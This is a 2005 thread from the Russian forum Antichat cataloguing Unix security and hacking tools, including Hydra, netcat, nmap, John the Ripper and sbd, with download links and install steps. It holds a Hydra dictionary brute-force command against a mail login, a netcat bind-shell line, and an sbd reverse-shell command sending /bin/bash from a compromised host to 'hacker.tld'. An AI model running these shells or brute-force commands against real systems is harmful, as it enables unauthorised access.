ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Soft - *nix
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

UNIX Tools
  #1  
Старый 24.07.2005, 14:35
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


Post UNIX Tools

Некоторые тулзы (вроде обзора).

THC Hydra
http://thc.org/download.php?t=r&f=hydra-4.7-src.tar.gz

Брутфорс для огромного кол-ва сервисов.
POP3, IMAP, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTPS-HEAD (SSL), ICQ, FTP, PostgreSQL, MySQL, SSH, Telnet, Netbios, LDAP NNTP, VNC ... и т д.

Правда, POP3 и IMAP на распространенных сервисах им брутить врядли удасться, попробовать стоит.
Модуль ICQ устарел и тоже не работает.
Чтобы использовать остальное, читайте мануалы в архиве.

Сначала стянем архив.
Код:
wget http://thc.org/download.php?t=r&f=hydra-4.7-src.tar.gz
Распакуем
Код:
gzip -d hydra-4.7-src.tar.gz
tar -xf hydra-4.7-src.tar
или
Код:
tar -xzf hydra-4.7-src.tar.gz
И ставим
Код:
cd hydra-4.7-src
./configure
make
make install
можно копирнуть назад и удалить исходники
Код:
cp hydra ..
cd ..
rm -rf hydra-4.7-src
Работаем
Код:
./hydra             (для справки)
./hydra -l lamer -P pass.txt -w 20 -t 10 pop.server pop3
для подбора пароля из словаря pass.txt к логину lamer
на сервере pop.server, timeout=20 sec, потоков 10.


NETCAT
http://online.securityfocus.com/data/tools/nc110.tgz

Ненадо комментировать. Утилита служит например при back-connect'е, или если надо пройти квест, отправляя на сервер произвольные ХТТП пакеты.

Прослушка порта
Код:
nc -l -p [PORT] -t
Коннект
Код:
nc server port
Типа bindshella
Код:
nc -l -p 28876 -t -e cmd.exe
NMAP
http://download.insecure.org/nmap/di...p-3.81.tar.bz2

Сканнер. Для некоторых флагов нужны права root.
Установка:
Тут у нас архив bzip. =>

Код:
bzip2 -cd nmap-VERSION.tar.bz2 | tar xvf -
cd nmap-VERSION
./configure
make
make install
Использование. Все не опишешь, читайте мануалы.
Например
Код:
./nmap -p 1-65535 server
TCPDump
http://www.tcpdump.org/release/tcpdump-3.9.3.tar.gz

Читаем http://www.tcpdump.org/

TCH amap
http://www.thc.org/download.php?t=r&f=amap-5.1.tar.gz

Установка не отличается от hydrы.

PuTTy
PuTTy http://www.tartarus.org/~simon/putty.../x86/putty.exe
Gen http://www.tartarus.org/~simon/putty...6/puttygen.exe
исходники http://the.earth.li/~sgtatham/putty/...ty-0.58.tar.gz
PSFTP http://www.tartarus.org/~simon/putty.../x86/psftp.exe

Хотя для Windows, я написал ее в этот топик. Это клиент SSH, Telnet, и др. С настройкой цветов, соотв. клавишь, звуков (динамика) и т д

John the Ripper
UNIX http://www.openwall.com/john/c/john-1.6.tar.gz
WINDOWS http://www.openwall.com/john/c/john-16w.zip
DOS http://www.openwall.com/john/c/john-16d.zip

Крякер хешей (подбор конечно).
Обычно юзают для подбора DES.

Код:
john
---------------------------------
 
Ответить с цитированием

  #2  
Старый 24.07.2005, 14:57
Аватар для nerezus
nerezus
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме:
6490435

Репутация: 2290


Отправить сообщение для nerezus с помощью ICQ
По умолчанию

Цитата:
Сначала стянем архив.

Код:


wget http://thc.org/download.php?t=r&f=hydra-4.7-src.tar.gz


Распакуем

Код:


gzip -d hydra-4.7-src.tar.gz
tar -xf hydra-4.7-src.tar

или

Код:


tar -xzf hydra-4.7-src.tar.gz


И ставим

Код:


cd hydra-4.7-src
./configure
make
make install


можно копирнуть назад и удалить исходники

Код:


cp hydra ..
cd ..
rm -r
или одной командой:
emerge hydra
для RPM-дистров(почти всех) и Дебиан/Убунту:
apt-get hydra
 
Ответить с цитированием

  #3  
Старый 24.07.2005, 14:59
Аватар для nerezus
nerezus
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме:
6490435

Репутация: 2290


Отправить сообщение для nerezus с помощью ICQ
По умолчанию

Нессус - сканер багов в шлюзовых интерфейсах (cgi-сканнер в народе)

Код:
emerge nessus
или
Код:
apt-get nessus
и т.д. для разных дистров
 
Ответить с цитированием

  #4  
Старый 25.07.2005, 00:40
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

Написал бы где его скачать ещё...
 
Ответить с цитированием

  #5  
Старый 25.07.2005, 03:36
Аватар для madnet
madnet
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719

Репутация: 1384


Отправить сообщение для madnet с помощью ICQ
По умолчанию

Цитата:
Сообщение от KEZ  
Написал бы где его скачать ещё...
http://www.nessus.org/download/
__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
 
Ответить с цитированием

Nikto
  #6  
Старый 25.07.2005, 04:52
Аватар для tester2005
tester2005
Познающий
Регистрация: 17.01.2005
Сообщений: 48
Провел на форуме:
24128

Репутация: 15
По умолчанию Nikto

Не очень мощьный но правда развивающийся cgi-сканер Nikto

Код:
http://www.cirt.net/nikto/nikto-current.tar.gz
Unix Requirements
PERL module NET::SSLeay
PERL module LibWhisker (LW.pm is included with source)
OpenSSL (only required if SSL scans are needed)


Код:
nikto [-h target] [options]
и полный README
 
Ответить с цитированием

  #7  
Старый 25.07.2005, 22:57
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

OpenSSL
http://www.openssl.org/

Пояснять думаю ненужно.

LSOF
ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/

Открытые файлы, смонтированые в /proc процессы... показывает

Hunt
http://lin.fsid.cvut.cz/~kra/index.html#HUNT

Пакетный (rawsocket) сниффер

NetFilter
http://www.netfilter.org/

Фаер/Фильтр. Не пользовался, но думаю вещь ничего...
 
Ответить с цитированием

Shadowinteger's Backdoor
  #8  
Старый 29.07.2005, 04:27
Аватар для tester2005
tester2005
Познающий
Регистрация: 17.01.2005
Сообщений: 48
Провел на форуме:
24128

Репутация: 15
По умолчанию Shadowinteger's Backdoor

Shadowinteger's Backdoor, Netcat-clone, утилитка для удаленного администрирования, защищённой отправки файлов, и p2p чата.

качаем:
Код:
 wget http://tigerteam.se/dl/sbd/sbd-1.36.tar.gz
Код:
 tar -zxvf sbd-1.36.tar.gz
установка:
Код:
 make unix
пример на бэкконект:
Код:
 user@owned# ./sbd -r1800 -Don -e /bin/bash hacker.tld 993
Readme в архиве объясняет как пользоватса.

Последний раз редактировалось tester2005; 04.08.2005 в 20:44..
 
Ответить с цитированием

  #9  
Старый 31.08.2005, 13:08
Аватар для Cr4sh
Cr4sh
Познающий
Регистрация: 25.08.2005
Сообщений: 57
Провел на форуме:
216363

Репутация: 76
Отправить сообщение для Cr4sh с помощью ICQ
По умолчанию

Ethereal - сниффер, имхо, один из луччих. Работа с любыми сетевыми интерфейсами, arp-spoofing, гибкая система фильтров.
http://www.ethereal.com/download.html

EncFs - тулза для создания зашифрованой виртуальной файловой системы
http://arg0.net/wiki/encfs
 
Ответить с цитированием

  #10  
Старый 08.10.2005, 20:35
Аватар для Krueger
Krueger
Новичок
Регистрация: 07.10.2005
Сообщений: 13
Провел на форуме:
75152

Репутация: 10
По умолчанию

Base64 - простая програма для конвертирования текста в base64 и обратно. http://www.fourmilab.ch/webtools/base64/

apg - Автоматический генератор паролей, использующий несколько надёжных алгоритмов. http://www.adel.nursat.kz/apg/

Authforce - HTTP брутфорсер. использует различные методы брутфорса пары логин/пароль для доступа к сайту. http://kapheine.hypa.net/authforce/

Bjorb - софтина для создания безопасного интернет соединения через ебезопасную сеть типа Internet.
фишки:
1. шифровка/расшифровка любого соединения на "статическом порту" при помощи SSL
2. ограничение доступа по IP адресам
http://www.hitachi-ms.co.jp/bjorb/

Doorman - бесшумный, невидимый а всех TCP портах сервер который откроет свою дверь тому, кто знает, секретный стук. http://doorman.sourceforge.net/ (backdoor короче.)

Fcrackzip - быстрый зломщик паролей к .zip архивам, аписаный на Си с включением кода на x86 ассемблере. Позволяет пользователям восстановить забытые пароли, используя брутфорс или подбор по словарю. http://www.goof.com/pcg/marc/fcrackzip.html

kssh - графический интерфейс а-ля putty для SSH. http://kssh.sourceforge.net

L0phtCrack - программа для расшифровки виндовский LANMAN и NT паролей (брутфорс и по словарю). http://www.atstake.com/products/lc/

mdcrack - брутит MD4 MD5 и NTLM1 хеши http://membres.lycos.fr/mdcrack/down...ack-1.2.tar.gz

Slurpie - подборщик паролей passwd, может работать в режиме распределённых вычислений. ftp://ftp.openbsd.org/pub/OpenBSD/di...ie-2.0b.tar.gz

Последний раз редактировалось Krueger; 09.10.2005 в 10:17..
 
Ответить с цитированием
Ответ


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Многопоточность в Unix KEZ С/С++, C#, Delphi, .NET, Asm 11 10.08.2005 18:29
Краткая история хакерства foreva Чужие Статьи 3 06.02.2005 19:29
InetCrack for Unix Neuz Болталка 1 14.01.2005 21:11
Проблемы с essential net tools Чаты 1 26.11.2002 19:46



TEST QR: []
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ